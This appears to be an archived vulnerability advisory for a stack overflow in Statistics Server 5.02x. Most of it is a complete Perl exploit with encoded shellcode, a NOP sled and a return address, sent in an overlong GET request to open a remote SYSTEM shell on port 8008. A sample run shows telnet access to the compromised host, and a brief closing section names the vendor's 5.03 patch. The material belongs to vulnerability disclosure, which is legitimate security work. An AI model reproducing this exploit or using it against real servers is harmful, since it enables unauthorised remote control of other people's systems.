COMMAND
Statistics Server
SYSTEMS AFFECTED
Statistics Server 5.02x
PROBLEM
'|Zan' and Nemo found following. 'Statistics Server is far more
than just another log analyzer. It analyzes Web site traffic in
"Real-time" and generates "Live Stats" reports in an easy to use
Web interface.'
'The ability of Statistics Server to deliver Live Web statistics
for high volume installations has made it an essential component
of many corporate Internet and Intranet Web sites and ISP Web
hosting installations.'
Statistics Server 5.02x ships with a stack overflow in its web
component. It *lets run arbitrary code inside* by local/remote
user. Tests, ideas & exploits were tested against Win2k/Spanish
version and WinNT 4.0/sp6a Spanish version. Web server runs like
a system service with a default installation.
Web server can't handle long requests correctly. When a long GET
(about 2033 bytes) request is made. It dies with EIP overwritten.
It lets run arbitrary code with web servers privileges (system
privileges by default).
Exploit? It spawns a remote winshell on 8008 port. It doesn't
kill webserver so webserver continues running while hack is
made. When hack is finished webserver will run perfectly too.
$ lynx http://vulnerable.com
Server Selection
Please Enter Server ID _____________ GO
....
$ ./ssexploit502x.pl vulnerable.com 80
(c) Deep Zone - Statistics Server 5.02x's exploit
Coded by |Zan - izan@deepzone.org
-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-
spawning remote shell on port 8008 ...
HTTP/1.0 302
Server: Statistics Server 5.0
Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
... ... ... ... ... ... ...
Content-Type: text/html
Connection: Keep-Alive
Content-Lenght: 0
... done.
$ lynx http://vulnerable.com (It continues working }:)
Server Selection
Please Enter Server ID _____________ GO
....
$ telnet vulnerable.com 8008
Trying vulnerable.com...
Connected to vulnerable.com.
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
D:\StatisticsServer>
Exploit works against Win2k/Statistics Server 5.02x running like
service.
#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit.
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net
# http://mareasvivas.cjb.net (|Zan homepage)
#
# --|Zan <izan@deepzone.org>
#
--------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <nemo@deepzone.org>
#
# exploit coded by
# -- |Zan <izan@deepzone.org>
#
#
--------------------------------------------------------
use IO::Socket;
@crash = (
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");
#
--------------------------------------------------------
sub pcommands
{
die "usage: $0 hostname port\n" if (@ARGV != 2);
($host) = shift @ARGV;
($port) = shift @ARGV;
}
sub show_credits
{
print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's";
print "exploit\n\n\t\t Coded by |Zan - izan\@deepzone.org\n";
print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb";
print ".net ]=-\n\n";
}
sub bofit
{
print "\nspawning remote shell on port 8008 ...\n\n";
$s = IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port,
Proto=>"tcp");
if(!$s) { die "error.\n"; }
print $s "GET http://O";
foreach $item (@crash) {
print $s $item
}
for ($cont=0; $cont<840;$cont++) {
print $s "\x90"
}
print $s "\x8c\x3e\x1d\x01";
print $s "\r\n\r\n";
while (<$s>) { print }
print "... done.\n\n";
}
# ----- begin
show_credits;
pcommands;
bofit;
# ----- that's all :)
SOLUTION
MediaHouse has created a 5.03 patch that corrects for the
Statistics Server (LiveStats) 5.02x memory overflow bug.
Additionally 5.03 addresses a problem in the mail engine in
regards to Windows 2000. Log file management and server
administration is more robust. Download:
http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe